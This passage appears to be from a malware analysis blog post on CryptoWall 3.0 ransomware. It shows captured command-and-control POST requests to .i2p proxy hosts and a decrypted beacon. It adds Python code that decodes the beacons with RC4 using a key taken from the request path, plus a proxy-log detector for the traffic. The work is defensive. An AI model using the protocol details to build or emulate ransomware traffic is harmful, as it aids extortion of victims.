User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy2-2-2.i2p

v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c
---------------Slightly Edited-------
POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy1-1-1.i2p

z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626
--------------------------------------------------
Which, decrypted, is (don't try with the data above: some hex characters were changed on purpose):
z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}
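To make the "sorted path is the RC4 key" observation concrete, here is an added example (my code, not the malware's nor @Horgh_RCE's tooling) that derives the key from a request path, RC4-decrypts the hex body of a beacon and splits the pipe-delimited plaintext. The key derivation (sort the characters of the last path segment, no leading slash) is my reading of the post; the field names in `parse_beacon` are my labels, since the post only shows the raw layout. The test vector is constructed by encrypting a plaintext in the documented shape, because the capture above was altered on purpose.

```python
from binascii import hexlify, unhexlify


def key_from_path(path: str) -> bytes:
    """Assumption from the post: the RC4 key is the alphanumerically sorted
    random path segment of the POST, e.g. /hz13ackt0y -> b"013achktyz"."""
    segment = path.rsplit("/", 1)[-1]
    return "".join(sorted(segment)).encode("ascii")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream); one call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_beacon(path: str, body: str) -> str:
    """Turn a 'z=<hex>' (or 'v=<hex>') body posted to <path> back into plaintext.
    The single-letter parameter name is ignored; only the hex payload matters."""
    _name, _, hexdata = body.partition("=")
    return rc4(key_from_path(path), unhexlify(hexdata)).decode("latin-1")


def encode_beacon(path: str, plaintext: str, param: str = "z") -> str:
    """Inverse of decode_beacon; used here only to build a constructed test vector."""
    cipher = rc4(key_from_path(path), plaintext.encode("latin-1"))
    return param + "=" + hexlify(cipher).decode("ascii")


def parse_beacon(plaintext: str) -> dict:
    """Split '{1|crypt1|<id>|2|1|2||<ip>}' into fields.
    Field names are my labels; the post does not name them."""
    fields = plaintext.strip("{}").split("|")
    return {
        "version": fields[0],
        "campaign": fields[1],
        "bot_id": fields[2],
        "extra": fields[3:-1],
        "ip": fields[-1],
    }


# Constructed test vector (the path is from the capture above, the bot id and
# IP are placeholders, and the hex is produced here rather than taken from the post).
SAMPLE_PATH = "/hz13ackt0y"
SAMPLE_PLAIN = "{1|crypt1|0123456789ABCDEF0123456789ABCDEF|2|1|2||192.0.2.10}"
SAMPLE_BODY = encode_beacon(SAMPLE_PATH, SAMPLE_PLAIN)

if __name__ == "__main__":
    print(SAMPLE_BODY)
    print(parse_beacon(decode_beacon(SAMPLE_PATH, SAMPLE_BODY)))
```

To try it on a real capture, pass the request path from the POST line and the full body (`z=...`) to `decode_beacon`; if the result is not a `{...|...}` string the key assumption does not hold for that sample.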

But wait... if you are lucky (or not :) ) here is what you may see on the Decrypt service:

Error on the Decrypt Service. It seems this service chains Tor and i2p.
Service i2p:
http://decrypt-service.i2p/decrypt_service_ejakdanrmv8ka4jak2a5jfdn/vRRRbw
"Сайт I2P недоступен. Возможно, он отключен, сеть перегружена или ваш маршрутизатор недостаточно интегрирован с другими узлами. Вы можете повторить операцию."

Google says:

"I2P website is unavailable. Perhaps he is disabled, the network is congested or your router is not well integrated with other nodes. You can repeat the operation."

So... they are sadly back, and we can expect a lot of them in Exploit Kits, spam, tasks in botnets etc.

Files: Cryptowall_3.0.zip contains: 6c3e6143ab699d6b78551d417c0a1a45 and 47363b94cee907e2b8926c1be61150c7
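The two network behaviours described in this post, a lookup against one of the three external-IP services followed shortly by a POST to a `.i2p` host through the corporate proxy, are easy to turn into a detection. Here is an added example (my code, not from the post) that runs that logic over constructed proxy log lines: it flags any client posting to a `.i2p` host, and flags it more strongly when the same client queried an IP-check service within the preceding window. The log format (timestamp, client, method, URL, status, quoted user-agent) and the client addresses are constructed for the example.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit

# The three services the post lists as used by the sample to learn its external IP
IP_CHECK_HOSTS = {"ip-addr.es", "myexternalip.com", "curlmyip.com"}

# Constructed proxy log (not from the post): time, client, method, url, status, "user-agent"
SAMPLE_LOG = """\
2015-01-13T10:00:01 10.0.0.5 GET http://ip-addr.es/ 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)"
2015-01-13T10:00:03 10.0.0.5 POST http://proxy1-1-1.i2p/hz13ackt0y 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)"
2015-01-13T10:05:00 10.0.0.9 GET http://myexternalip.com/raw 200 "curl/7.38.0"
2015-01-13T10:06:00 10.0.0.9 GET http://www.example.com/ 200 "curl/7.38.0"
2015-01-13T12:00:00 10.0.0.7 POST http://proxy2-2-2.i2p/p1256nl9su84v 200 "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d+) "(.*)"$')


def parse_log(text: str):
    """Yield one dict per well-formed line of the constructed log format."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not fit the format
        ts, client, method, url, status, ua = m.groups()
        parts = urlsplit(url)
        yield {
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "method": method,
            "host": parts.hostname or "",
            "path": parts.path,
            "status": int(status),
            "ua": ua,
        }


def find_suspects(text: str, window_seconds: int = 600) -> dict:
    """Map client -> sorted list of reasons. 'post_to_i2p' fires on any POST to a
    .i2p host; 'ipcheck_then_i2p_post' fires when that client hit one of the
    IP-check services within window_seconds before the POST."""
    last_ipcheck = {}   # client -> time of its most recent IP-check request
    findings = {}       # client -> set of reasons
    for rec in parse_log(text):
        if rec["host"] in IP_CHECK_HOSTS:
            last_ipcheck[rec["client"]] = rec["ts"]
        if rec["method"] == "POST" and rec["host"].endswith(".i2p"):
            reasons = findings.setdefault(rec["client"], set())
            reasons.add("post_to_i2p")
            seen = last_ipcheck.get(rec["client"])
            if seen is not None and (rec["ts"] - seen).total_seconds() <= window_seconds:
                reasons.add("ipcheck_then_i2p_post")
    return {client: sorted(reasons) for client, reasons in findings.items()}


if __name__ == "__main__":
    for client, reasons in find_suspects(SAMPLE_LOG).items():
        print(client, reasons)
```

The IP-check lookup on its own is not a signal (admins and scripts use those services too, as the `curl` client in the sample shows); the combination with a POST to an i2p proxy host, which a normal workstation has no reason to make, is what is worth alerting on.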





